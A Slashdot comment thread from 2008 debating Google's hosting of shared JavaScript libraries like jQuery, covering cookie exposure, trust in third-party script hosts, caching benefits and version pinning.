          And I'm NOT wrong about cookies. Your site's cookies are not sent in the HTTP request, they would only be accessible via JavaScript--and again, without Google modifying the source code of these libraries to be malicious, they wouldn't be privy to those cookies.

          Not that cookies store anything useful these days... almost everyone with serious server-side code uses server-side persisted sessions, so the only cookie is the session ID.
    • by Bogtha ( 906264 )

      Well, one effect of this would be to allow google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js etc.

      The difference between this and urchin, adsense, etc, is that the specific scripts you use are defined ahead of time. If they serve anything other than jQuery or whatever, then they are almost certainly in breach of many laws across the world, e.g. the Computer Misuse Act in the UK. When you reference jQuery on their systems, y

  • I asked Google to do this a long time ago:

    http://www.tallent.us/blog/?p=7

    This will enable web developers to support richer, cross-browser apps without the full "hit" of additional HTTP connections and bandwidth.

    Users gain the benefit of faster rendering on every site that uses these libraries--both due to proper caching, and because their browser can open more simultaneous HTTP connections.

    If Google goes down, change your header/footer scripts. BFD.

    In an age where Flash/Silverlight/etc. are supposed to be t
  • Dependency hell? (Score:4, Insightful)

    by jmason ( 16123 ) on Wednesday May 28, 2008 @12:01PM (#23571677) Homepage
    One site covering this [ajaxian.com] noted plans to 'stay up to date with the most recent bug fixes' of the hosted libraries -- this sounds like blindly upgrading the hosted libraries to new versions, which is a very bad idea.

    As a commenter there noted, it's a much better idea to use version-specific URIs, allowing users to choose the versions they wish to use -- otherwise version mismatches will occur between user apps and the Google-hosted libs, creating bugs and the classic 'dependency hell' that would be familiar to anyone who remembers the days of 'DLL hell'.
    • Re: (Score:3, Informative)

      by Spaceman40 ( 565797 )
      Read, and be enlightened:

      The versioning system allows your application to specify a desired version with as much precision as it needs. By dropping version fields, you end up wild carding a field. -- google.load() versioning [google.com]
  • This isn't something Google came up with. It's great that they're doing it, but YUI did it quite a while ago. http://developer.yahoo.com/yui/articles/hosting/ [yahoo.com]

Two can Live as Cheaply as One for Half as Long. -- Howard Kandel

Working...